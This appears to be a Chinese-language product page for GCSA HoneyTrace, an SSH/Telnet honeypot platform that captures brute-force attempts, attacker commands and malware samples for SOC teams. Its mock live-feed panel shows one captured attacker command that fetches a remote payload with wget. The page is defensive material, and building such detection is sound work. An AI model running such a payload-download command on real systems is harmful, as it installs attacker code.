GCSA 生态产品

秒级捕获企业暴露面攻击行为

GCSA HoneyTrace 是一款面向企业 SSH 与 Telnet 暴露面的欺骗防御平台。通过受控蜜罐节点捕获弱口令爆破、入侵命令、恶意载荷和攻击来源,帮助 SOC 团队提前发现威胁、留存证据并确定处置优先级。

GCSA 蜜罐遥测流网络图展示攻击流量进入蜜罐节点,并转化为分析、恶意样本采集、SIEM 输出和联盟情报。扫描爆破GCSA蜜罐会话回放恶意软件样本SIEM事件IOC 源载荷捕获告警通道:启用

风险总览

把暴露服务风险转化为企业可处置的告警

面向企业 SOC 的风险视图,将威胁来源、入侵事件、攻击趋势和重点节点关联起来,帮助团队快速定位高风险入口、保留取证证据并安排处置优先级。

登录
风险总览
实时数据近 7 天
溯源画像53 会话
威胁源 IP42今日攻击事件
蜜罐入侵199 高危
未处置告警72 捕获样本

事件分布

活跃
3,051总事件
事件来源占比
蜜罐入侵1,2864242%
端口探测9143130%
弱口令尝试6372421%
Ping 扫描214127%

威胁事件趋势

近 7 天

节点威胁源 IP Top 3

近 7 天
shanghai-edge-01185.17.92.44 · 42 事件 / critical
singapore-telnet-02103.214.10.8 · 29 事件 / high
frankfurt-ssh-0191.240.118.23 · 18 事件 / medium
SSH/Telnet协议覆盖
7×24攻击捕获
SIEM即插即用输出

企业欺骗防御

降低暴露服务带来的安全盲区

HoneyTrace 帮助企业看清谁在触达暴露入口、使用了哪些账号口令和攻击工具、哪些事件需要进入 SOC 调查与优先处置。

欺骗

SSH 与 Telnet 蜜罐

暴露可信的仿真服务,捕获暴力破解、交互式 shell、上传文件和攻击工具,同时隔离生产系统。

取证

会话录制

保存命令、按键、文件系统活动、时序和可回放终端会话,用于调查和响应。

采集

恶意样本捕获

收集入侵者投递的样本与 URL,补充上下文并路由到分析流水线。

运营

SIEM 就绪遥测

将标准化事件转发到 Splunk、Elastic、Sentinel、syslog、webhook 或数据湖。

联防

联盟级感知

跨暴露面部署节点,对比不同区域、行业和基础设施层的攻击行为。

检测

早期预警信号

将低噪声对抗交互转化为针对凭证攻击、僵尸网络和后渗透行为的及时指标。

AI 分析

LLM 辅助威胁研判

将会话、命令、样本、IOC 和上下文整理为 LLM 可读摘要,辅助 SOC 快速判断攻击意图、优先级和处置建议。

运营流程

从暴露面到证据与响应

企业需要的不只是发现攻击,而是把攻击行为沉淀为可回放证据、检测规则和处置优先级。HoneyTrace 通过结构化遥测和 AI 可读上下文缩短这条路径。

01

暴露受控服务

在 DMZ、云、分支或实验网络中放置 GCSA 蜜罐节点,让扫描和凭证攻击自然抵达。

02

捕获攻击行为

记录认证尝试、交互 shell、下载、上传载荷和命令序列,并保留完整会话上下文。

03

增强并路由遥测

将原始交互转化为指标、回放证据和结构化事件,用于 SOC 工具和联盟情报共享。

实时信号

10:24:08 ssh 认证失败 root / 185.17.x.x
10:24:11 命令:wget http://host/payload.sh
10:24:14 样本已捕获 sha256: 9f2a...
10:24:17 事件已路由到 SIEM 通道
4样本
12事件
1告警

集成网络

无需重建安全栈,即可输出 SOC 信号

将会话、指标、载荷元数据和攻击事件转发到安全团队已经使用的工具。

SplunkElastic StackMicrosoft SentinelSyslogWebhooksMISPTheHiveS3 / Data LakeLLM / AI Copilot

部署咨询

为暴露服务构建受控欺骗层。

与 GCSA 团队一起规划节点位置、路由方式、遥测输出与联盟共享要求。

联系 GCSA 专家